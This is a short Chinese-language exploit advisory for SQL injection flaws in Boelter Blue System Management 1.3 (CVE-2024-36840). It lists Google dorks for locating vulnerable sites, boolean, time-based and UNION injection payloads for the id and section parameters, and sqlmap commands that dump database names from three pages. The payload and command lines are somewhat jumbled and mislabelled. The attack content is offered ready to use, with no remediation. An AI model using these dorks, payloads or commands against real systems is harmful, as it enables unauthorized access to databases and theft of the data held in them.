漏洞利用标题:Boelter Blue 系统管理软件(1.3 版)中的 SQL 注入漏洞
原始 Google Dork:inurl:"Powered by Boelter Blue"(无效(搜索中零个 URL))
Theexploiters 提供的 Google Dork:intext:"Powered by Boelter Blue"(有效)
日期:2024-06-04
漏洞利用作者:CBKB (DeadlyData, R4d1x)
厂商主页:Boelter Blue
软件链接:Google Play Store
版本:1.3
测试环境:Linux Debian 9 (stretch)、Apache 2.4.25、MySQL >= 5.0.12
CVE:CVE-2024-36840
在 Boelter Blue 系统管理软件(1.3 版)中发现了多个 SQL 注入漏洞。这些漏洞允许攻击者通过各种参数注入并执行任意 SQL 命令。成功利用这些漏洞可能导致未授权访问、数据泄露以及潜在的账户接管。
参数:id(GET)
id=10071 AND 4036=4036类型:基于时间的盲注
id=10071 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)类型:UNION 查询
id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,...news_details.php?id
https://www.example.com/news_details.php?id=10071sqlmap -u "https://www.example.com/news_details.php?id=10071" --random-agent --dbms=mysql --threads=4 --dbs
services.php?section
https://www.example.com/services.php?section=5081sqlmap -u "https://www.example.com/services.php?section=5081" --random-agent --tamper=space2comment --threads=8 --dbs
location_details.php?id
https://www.example.com/location_details.php?id=836sqlmap -u "https://www.example.com/location_details.php?id=836" --random-agent --dbms=mysql --dbs